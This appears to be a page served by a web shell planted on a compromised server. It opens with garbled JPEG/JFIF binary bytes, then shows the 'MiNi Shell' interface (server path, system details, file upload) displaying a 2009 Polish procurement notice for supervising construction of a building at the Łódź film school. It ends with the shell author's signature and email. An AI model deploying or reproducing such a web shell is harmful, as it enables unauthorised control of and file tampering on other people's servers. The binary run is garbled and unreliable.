JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123307-N-2009.html

<p class="kh_header"><b>Łódź: Pełnienie obowiązków Nadzoru Inwestorskiego nad realizacją zadania inwestycyjnego pn. Budynek dydaktyczny PWSFTviT w Łodzi - Uczelniane Centrum Dydaktyki Nowych Mediów</b><br>
<b>Numer ogłoszenia: 123307 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Filmowa, Telewizyjna i Teatralna im. L. Schillera w Łodzi , ul. Targowa 61/63, 90-323 Łódź, woj. łódzkie, tel. 042 6345800, faks 042 674 81 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filmschool.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Nadzoru Inwestorskiego nad realizacją zadania inwestycyjnego pn. Budynek dydaktyczny PWSFTviT w Łodzi - Uczelniane Centrum Dydaktyki Nowych Mediów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi dotyczącej koordynacji, zarządzania, kontroli, nadzoru i rozliczenia całościowego, a także częściowego zadania inwestycyjnego wraz z niezbędną sprawozdawczością, ewaluacją projektu, a także monitoringiem, ze szczególnym uwzględnieniem zasad dokonywania wyżej wymienionych czynności przy realizacji zadań inwestycyjnych z udziałem środków pieniężnych pochodzących z Unii Europejskiej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium wynosi 6.000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 Ustęp 1 Prawa zamówień publicznych: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)  nie podlegają wykluczeniu zakresie postępowania zakresie udzielenie zamówienia na podstawie art. 24 pzp. 
W zakresie doświadczenia wymagane jest wykazanie w okresie ostatnich 3 lat minimum 2    
(dwóch) usług pełnienia funkcji nadzoru inwestorskiego nad realizacją robót budowlanych 
i instalacyjnych oraz 3 lat w rozliczaniu tych robót z udziałem dofinansowania ze środków unijnych lub budżetu Państwa, o wartości robót nie mniejszej niż 20.000.000,00 PLN (brutto)  przynajmniej 1 zadanie, lecz łącznie 35.000.000,00 PLN (brutto) wartości dwóch robót. 
W zakresie potencjału technicznego wymagane jest posiadanie lub wykazanie dostępu do sprzętu niezbędnego do realizacji zadania, tj.:
       laboratorium zdolnego do wykonania badań zgodnie z wymaganiami Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych w zakresie przewidzianym dla Nadzoru Inwestorskiego, 
            samochodu osobowego w ilości zapewniającej potrzeby nadzoru, 
           sprzętu geodezyjnego w ilości zapewniającej obsługę geodezyjną, 
           dostępu do internetu, sprzętu komputerowego, poligraficznego, telefonu stacjonarnego, komórkowego, faxu. 
 
W zakresie osób zdolnych do wykonania zamówienia wymagane jest wykazanie minimum po jednej osobie na każde wymienione poniżej stanowisko posiadającej odpowiednie uprawnienia, doświadczenie zawodowe oraz spełniającej odpowiednie wymagania: 
 Kierownik Nadzoru Inwestorskiego posiadający doświadczenie w prowadzeniu w ciągu ostatnich 5 lat minimum dwóch nadzorów porównywalnych zadań z załączeniem dokumentu potwierdzającego należyte wykonanie zadania. Winien ponadto posiadać od minimum 10 lat uprawnienia do kierowania i nadzorowania budowami oraz wykazać przynależność do Izby Inżynierów Budownictwa,
               Inspektor nadzoru robót budowlanych, 
               Inspektor nadzoru w specjalności teletechnicznej,
               Inspektor nadzoru robót drogowych,   
               Inspektor nadzoru robót sanitarnych (instalacje wod kan, CO, wentylacja grawitacyjna,  klimatyzacja), 
               Inspektor nadzoru robót elektrycznych, 
               Geodeta,
               Specjalista ds. kosztorysowania i rozliczeń,
            
Każdy z inspektorów poszczególnych branż musi się wykazać niezbędnymi uprawnieniami do kierowania i nadzorowania budowami, mieć minimum 5 letnie doświadczenie zawodowe oraz wykazać się przynależnością do Izby Inżynierów Budownictwa.
Osoba lub osoby posiadające uprawnienia w zakresie kosztorysowania i rozliczania realizacji zadań inwestycyjnych z zakresu budownictwa, z udziałem finansowym pochodzącym ze środków pieniężnych Unii Europejskiej lub pochodzących z Budżetu Państwa, przy czym osoba ta i/lub osoby te powinny w ciągu ostatnich pięciu lat dokonać rozliczeń dwóch takich zadań  do dokonanych rozliczeń nie powinno być żadnych zastrzeżeń tak merytorycznych jak i rachunkowych     potwierdzeniem tych umiejętności powinno być złożone oświadczenie inwestorów lub dokumenty poświadczające audyt rozliczeń.
Każdy z inspektorów poszczególnych branż oraz Kierownik Nadzoru Inwestorskiego muszą być etatowymi pracownikami podmiotu zbiorowego ubiegającego się o zamówienie.
 
Inspektor Nadzoru Inwestorskiego w specjalności teletechnicznej oraz  specjalista ds. kosztorysowania i rozliczeń oraz geodeta mogą być użyci jako podwykonawcy.

Zamawiający przewiduje przekazanie pomieszczenie biura nadzoru budowlanego na zasadach odpłatnego użyczenia. Kierownik Nadzoru Inwestorskiego i lub osoba prawomocnie przez Kierownika Nadzoru  Inwestorskiego umocowana będzie inspektorem nadzoru budowy przebywającym na stałe na terenie placu budowy i realizacji zadania inwestycyjnego objętego zamówieniem.

Zamawiający dopuszcza łączenie: 
funkcji inspektorów poszczególnych branż w przypadku posiadania odpowiednich uprawnień, 
funkcji Kierownika Nadzoru Inwestorskiego  z inspektorem branżowym. 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych 
w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ wg formuły spełnia nie spełnia. 
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy 
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w art. 22 ust. 1 pzp., Wykonawca składa oświadczenie zawarte w formularzu OFERTA. 
1. Zamawiający w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych, żąda załączenia do oferty: 
a) aktualnego pełnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 8 ustawy Prawo zamówień publicznych wystawioną nie wcześniej niż 6 miesięcy przed terminem składania ofert ,
c) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych wystawioną nie wcześniej niż 6 miesięcy przed terminem składania ofert ,
d) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu   wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokumenty muszą być złożone przez każdego Wykonawcę. 
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  zamiast dokumentów, o których mowa w 7.1. ppkt a) c) d)   składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
                       nie otwarto jego likwidacji ani nie ogłoszono upadłości   nie wcześniej niż 3 miesięcy przed 
                       upływem terminu składania ofert, 
                      nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
                       albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
                       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu   nie wcześniej niż 
                       3 miesiące przed upływem terminu składania ofert, 
                       nie orzeczono wobec niego zakazu ubiegania się o zamówienie   nie wcześniej niż 3 miesięcy
                       przed upływem terminu składania ofert; 
                  W przypadku dokumentów, o których mowa w pkt 7.1 ppkt  b)
                       składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia
                        albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 
                        pkt   4 8  ustawy Prawo zamówień publicznych. 
 
3.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7.2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
Zapis dotyczący terminów wystawienia stosuje się odpowiednio. 

            W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokumenty muszą  być złożone  przez każdego Wykonawcę. 
 4. Zamawiający w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie  oraz dysponuje osobami zdolnymi do wykonania zamówienia, żąda załączenia do oferty: 
a) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy   w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, 
z podaniem ich wartości oraz daty i miejsca wykonania   sporządzonego wg załącznika  DOŚWIADCZENIE ZAWODOWE 
Wymagane jest wykazanie w okresie ostatnich  3 lat minimum 2 usług pełnienia funkcji Nadzoru Inwestorskiego nad realizacją robót budowlanych i instalacyjnych oraz 3 lat w rozliczaniu tych robót z udziałem dofinansowania ze środków unijnych lub Budżetu Państwa, o wartości robót nie mniejszej niż 20.000.000,00  PLN (brutto)   przynajmniej jedno zadanie, lecz łącznie 35.000.000,00 PLN (brutto) wartości dwóch robót. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek muszą spełniać łącznie. 
b) wykazu sprzętu niezbędnego do wykonania zamówienia, jakimi dysponuje Wykonawca 
Wymagane jest posiadanie lub dostęp do: 
  laboratorium zdolnego do wykonania badań zgodnie z wymaganiami Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych w zakresie przewidzianym dla Nadzoru Inwestorskiego, 
   samochodu osobowego w ilości zapewniającej potrzeby nadzoru, 
   sprzętu geodezyjnego w ilości zapewniającej obsługę geodezyjną, 
   Internetu, sprzętu   komputerowego, poligraficznego, telefon stacjonarnego, komórkowego, faxu. 
Na potwierdzenie ww. warunku Zamawiający żąda załączenia do oferty oświadczenia o dostępie do wymaganego sprzętu. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełniać łącznie. 
c) wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. 
Wymagane jest wykazanie minimum po jednej osobie na każde wymienione poniżej stanowisko, posiadającej odpowiednie uprawnienia, doświadczenie zawodowe oraz spełniającej odpowiednie wymagania: 

  Kierownik Nadzoru  Inwestorskiego posiadający doświadczenie w prowadzeniu w ciągu ostatnich 5 lat minimum dwóch  nadzorów z załączeniem dokumentu potwierdzającego należyte wykonanie zadania. Kierownik Nadzoru winien ponadto posiadać od minimum 10 lat uprawnienia do kierowania i nadzorowania budowami oraz wykazać przynależność do Izby Inżynierów Budownictwa. 
  Inspektor nadzoru w specjalności teletechnicznej,
  Inspektor nadzoru robót  budowlanych,
  Inspektor nadzoru robót sanitarnych ( instalacje wod kan, CO, wentylacja grawitacyjna,  klimatyzacja, 
  Inspektor nadzoru robót elektrycznych,
  Inspektor nadzoru robót drogowych,
  Geodeta,
  Specjalista ds. kosztorysowania i rozliczeń,
                                                                                                                    
Każdy z inspektorów poszczególnych branż musi się wykazać niezbędnymi uprawnieniami do kierowania i nadzorowania budowami,   mieć minimum  5 letnie doświadczenie zawodowe oraz wykazać się przynależnością do Izby Inżynierów Budownictwa. 

Zamawiający dopuszcza łączenie: 

  funkcji inspektorów poszczególnych branż  w przypadku posiadania odpowiednich uprawnień,
  funkcji Kierownika Nadzoru Inwestorskiego z inspektorem branżowym. 
Do wykazu należy załączyć dokument potwierdzający posiadanie uprawnień oraz zaświadczenie o wpisie do właściwej izby samorządu zawodowego. 
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełniać łącznie. 
d) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania  zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ppkt 7.4. b), Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował. 
e) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 7.4. c), Wykonawca wykazał osoby, którymi będzie dysponował. 
Uwaga: 
Dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 
Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
Zamawiający wykluczy Wykonawców którzy nie złożą oświadczenia o spełnianiu warunków udziału 
w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty będą zawierały błędy oraz Wykonawców którzy nie złożyli pełnomocnictw, z zastrzeżeniem: Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału 
w postępowaniu oraz spełnianie przez oferowane usługi  wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 

Zamawiający wzywa w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.filmschool.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Filmowa, Telewizyjna i Teatralna, Sekretariat Kanclerza, 90-323 Łódź, ul. Targowa 61/63.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 10:00, miejsce: Sekretariat Kanclerza Państwowej Wyższej Szkoły Filmowej, Telewizyjnej i Teatralnej, ul. Targowa 61/63, 90-323 Łódź (bud. B pok. 210).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com